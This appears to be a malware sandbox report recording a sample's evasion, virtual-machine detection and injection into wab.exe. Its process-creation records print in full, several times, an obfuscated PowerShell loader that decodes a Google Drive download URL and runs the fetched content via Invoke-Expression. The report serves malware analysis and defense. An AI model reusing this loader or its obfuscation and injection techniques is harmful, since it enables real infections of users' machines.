Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98593s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98484s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98375s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98266s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98141s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98029s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97922s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97813s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97688s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -97110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96862s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96735s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96610s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96485s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96360s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96235s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -96110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95860s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95735s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95610s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -95464s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99734	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99625	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99391	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99276	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98813	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98593	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98484	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98375	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98266	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98141	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98029	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97922	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97813	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96862	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96735	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96610	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96485	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96360	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96235	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95860	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95735	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95610	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95464	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wab.exe, 00000009.00000002.2928711448.0000000006AC8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928711448.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2106027892.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.2329475776.000001D971C5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla.(

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_078D0638 LdrInitializeThunk,

4_2_078D0638

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29CFA44			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega	Jump to behavior
